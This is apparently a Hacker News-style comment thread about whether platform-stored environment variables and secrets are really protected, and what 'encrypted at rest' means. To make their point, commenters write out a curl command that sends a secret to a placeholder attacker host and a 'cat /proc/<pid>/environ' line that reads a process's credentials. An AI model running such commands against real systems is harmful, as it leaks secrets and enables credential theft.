upvote
Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.
reply
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?

reply
Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.

However I do feel now like my sensitive things are better off deployed on a VPS where someone would need a ssh exploit to come at me.

reply
dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/

Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.

The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.

reply
Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?
reply
Keepass has an option to "encrypt in memory" certain passwords, sensitive information.

The point of encryption is often times about what other software or hardware attacks are minimized or eliminated.

However, if someone figures out access to a running system, theres really no way to both allow an app to run and keep everything encrypted. It certainly is possible, like the way keepass encrypts items in memory, but if an attacker has root on a server, they just wait for it to be accessed if not outright find the key that encrypted it.

This is to say, 99.9% of the apps and these platforms arn't secure against this type of low level intrusion.

reply
deleted
reply
[dead]
reply
If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.

Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.

A running machine is not “at rest”, just like you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.

reply
"encrypted at rest" is great to guard against stolen laptops, or in the server room both against people breaking in and stealing servers (unlikely at the security level of most hyperscalers, but possible) or more commonly broken HDDs being improperly disposed
reply
How does that transalte to VMs? If "encryption at rest" is done at the guest level, instead of (or in addition to) host, that would be pretty close to minimal "encrypted except when it use" time and protect against virtual equivalents of pulling a hard drive out of a data center.
reply
There isn't really a way around it.
reply
Run your own servers so the .env isn't shared with your hosting provider?
reply
There is -- you can expose a UNIX socket for serving credentials and allow access to it only from a whitelist of systemd services.
reply
That works on a single persistent box, but unfortunately, that means giving up on autoscaling, which is not so nice for cloud applications.
reply
You can proxy the UNIX socket to a network server if you want to. You can even use SSL encryption at all times too.
reply
Once it's networked you lose the "whitelist of systemd services" and it's then no different from any networked secret store.
reply
They would still exist in plaintext, just the permissions would make it a little harder to access.
reply
No, UNIX sockets work over SSL too.

You can, theoretically, decompile the system memory dump and try to mine the credentials out of the credential server's heap, but that exploit is exponentially more difficult to do that a simple `cat /proc/1234/environ`.

reply
It seems only encrypt and throw away the key would be the acceptable strategy
reply
They need to give your app the environment variables later so they cannot throw away the key.

For non-sensitive environment variables, they also show you the value in the dashboard so you can check and edit them later.

Things like 'NODE_ENV=production' vs 'NODE_ENV=development' is probably something the user wants to see, so that's another argument for letting the backend decrypt and display those values even ignoring the "running your app" part.

You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

reply
> You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

Piping to /dev/null is of course pointless.

What you really want is the /dev/null as a Service Enterprise plan for $500/month with its High Availability devnull Cluster ;)

https://devnull-as-a-service.com/pricing/

reply
Env vars are not secure. Anything that has root access can see all env vars of all applications via /proc.

(And modern Linux is unusable without root access, thanks to Docker and other fast-and-loose approaches.)

reply
How often do you log in as root, or use sudo to become root, when you're working with Docker containers?

Because I never do, unless I'm down in the depths of /var/lib/docker doing stuff I shouldn't.

reply
That just means you outsourced the `sudo` invocations to some other person. (Which is even worse.)
reply